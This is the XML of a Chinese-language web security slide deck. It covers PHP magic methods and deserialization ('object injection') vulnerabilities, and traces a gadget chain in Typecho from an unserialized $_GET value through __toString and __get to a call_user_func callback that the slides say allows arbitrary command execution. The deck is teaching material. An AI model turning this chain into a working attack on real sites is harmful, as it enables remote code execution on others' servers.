              <a:tr h="5040560">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file_get_contents</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="12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success');</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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="6496645"/>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上述代码执行完后会在屏幕上打印“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success”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1928801" y="1402731"/>
              <a:ext cx="351420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魔术方法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1195215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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有一类特殊的方法，它们以</a:t>
            </a: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__(</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两个下划线</a:t>
            </a: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开头</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特定的条件</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下会被调用，例如</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类的构造方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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__construct()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，它在实例化类的时候会被调用。</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中常见的一些魔术方法。</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192806" y="2633178"/>
          <a:ext cx="10229028" cy="438912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x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>construct()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，类的构造函数，创建新的对象时会被调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>destruct()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，类的析构函数，当对象被销毁时会被调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__call()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，在对象中调用一个</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>不可访问方法</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时会被调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__callStatic()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，用静态方式中调用一个不可访问方法时调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>get()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，读取一个</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>不可访问属性的值</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时会被调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__set()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，给不可访问的属性赋值时会被调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__isset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，当对不可访问属性调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>isset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>empty()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__unset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，当对不可访问属性调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>unset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时被调用。</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__sleep()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>serialize()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时，先会调用这个函数</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__wakeup()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>unserialize()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时，先会调用这个函数</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>toString()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>类被当成字符串时的回应方法</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__invoke()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，调用函数的方式调用一个对象时的回应方法</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__set_state()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>var_export()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>导出类时，此静态方法会被调用。</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__clone()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，当对象复制完成时调用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__autoload()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，尝试加载未定义的类</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__debugInfo()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，打印所需调试信息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2791" y="663997"/>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魔术方法的类的示例，在反序列化时，类中的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__wakeup()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方法会被调用，并输出“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 World”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1196809" y="1816125"/>
          <a:ext cx="10229028" cy="426720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a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class magic{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>function __wakeup(){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        echo 'Hello World';</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$object = new magic();</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$serialized = serialize($object);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>unserialize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>($serialized);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="28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1928801" y="1402731"/>
              <a:ext cx="351420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反序列化漏洞</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52156" y="1528093"/>
            <a:ext cx="10657184" cy="4519202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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反序列化漏洞又叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="32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对象注入漏洞</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在一个应用中，如果</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传给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="32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用户可控</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的，那么攻击者就可以通过传入一个</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精心构造的序列化字符串</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魔术方法来</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控制对象内部的变量甚至是函数</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对这一类漏洞的利用，往往需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="32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分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="32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32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应用的源代码</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208794" y="447973"/>
            <a:ext cx="10657185" cy="119521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下面是从一个现实场景中精简出的实例，我们将结合这个实例理解反序列化产生的原理以及如何对其进行利用。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1460822" y="1744117"/>
            <a:ext cx="10153128" cy="5262979"/>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__construct($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Typecho_Db_Adapter</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圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805638" y="3904357"/>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如果参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>adapterName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>是一个对象，则字符串的拼接会调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>方法</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0823" y="375965"/>
            <a:ext cx="10153128" cy="6247864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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array();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$_filter = array();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__get($key)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$this-&gt;get($key);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get($key, $default = NULL)</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switch (true)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case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isset</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default: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$default;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&amp;&amp;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strlen</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&gt; 0 ? $value : $default;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0823" y="375965"/>
            <a:ext cx="10153128" cy="6555641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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function 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if ($this-&gt;_filter)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foreach</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as $filter)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array_map</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 array();</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$value;</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圆角矩形标注 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933431" y="3760341"/>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将第一个参数作为回调函数，后面的参数作为回调函数的参数</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736005"/>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endPar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956767" y="2968253"/>
            <a:ext cx="10801200" cy="3323987"/>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该</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$_GET[‘__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从用户处获取了反序列化的对象，满足反序列化漏洞的基本条件，</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的参数可控，这里是漏洞的入口点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接下来，程序实例化了类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，类的参数是通过反序列化得到的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957983" y="1033149"/>
            <a:ext cx="11123116" cy="5355312"/>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的构造函数中，进行了字符串拼接的操作 </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魔术方法中，</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如果一个</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类被当做字符串</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处理，那么类中的</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方法将会被调用</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全局搜索，发现</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中存在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方法中，会访问类中私有变量</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screenName</a:t>
            </a:r>
            <a:endPar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43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对象</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并且该对象没有</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那么这个对象中的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，方法将会被调用</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43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中，正好定义了</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957983" y="1312069"/>
            <a:ext cx="11123116" cy="4616648"/>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方法会返回</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中调用了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而在</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中，使用了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call_user_function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其第一个参数是被调用的函数，第二个参数是被调用的函数的参数</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在这里</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都是我们可以控制的，因此可以用来执行任意系统命令</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至此，一条完整的利用链构造成功。</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4799" y="4668788"/>
            <a:ext cx="11123116" cy="2031325"/>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 = array(key=&gt;value)</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：创建一个关联数组</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age[‘Bill’]</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对应的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结论：要构造一个</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adapter</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array</a:t>
            </a:r>
            <a:endPar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748855" y="2667182"/>
            <a:ext cx="9077325" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="591989"/>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endPar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应该是个什么样的对象？</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721490"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4" name="矩形: 圆角 23"/>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在开发</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应用时，开发人员通常会将一些重复使用的代码写到单个文件中，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再通过文件包含，将这些单个文件中的代码插入到其它需要用到它们的页面中</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。文件包含可以极大的提高应用开发的效率，减少开发人员的重复工作，有利于代码的维护与版本的更新。</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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1604839" y="3090372"/>
            <a:ext cx="3168352" cy="3190249"/>
            <a:chOff x="1241134" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="íṡľíḍè-Rectangle 17"/>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文本框 65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1365388" y="3294819"/>
              <a:ext cx="2572513" cy="152697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配置文件</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。用于整个</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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应用的配置信息，如数据库的用户名及密码，使用的数据库名，系统默认的文字编码，是否开启</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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Debug</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模式等信息。右侧就是</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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wordpress</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博客系统配置文件的部分内容。</a:t>
              </a:r>
              <a:endPar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8425846" y="3028778"/>
            <a:ext cx="3166989" cy="3982337"/>
            <a:chOff x="5062586" y="3090372"/>
            <a:chExt cx="2733577" cy="2926986"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="íṡľíḍè-Rectangle 17"/>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 name="文本框 85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5171970" y="3155036"/>
              <a:ext cx="2593651" cy="2862322"/>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重复使用的函数</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如连接数据库，过滤用户的输入中的危险字符等。这些函数使用的频率很高，在所有需要与数据库进行交互的地方都要用到相似的连接数据库的代码；在几乎所有涉及到获取用户输入的地方都需要对其进行过滤，以避免出现像</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注入、</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这样的安全问题。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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 name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971066" y="3050689"/>
            <a:ext cx="3296231" cy="32628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29805" y="1024037"/>
            <a:ext cx="11089233" cy="3749761"/>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array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adpter</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的值应该是什么呢？</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考虑攻击链中，期望触发</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t> public function __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        $this-&gt;item['author']-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>screenName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
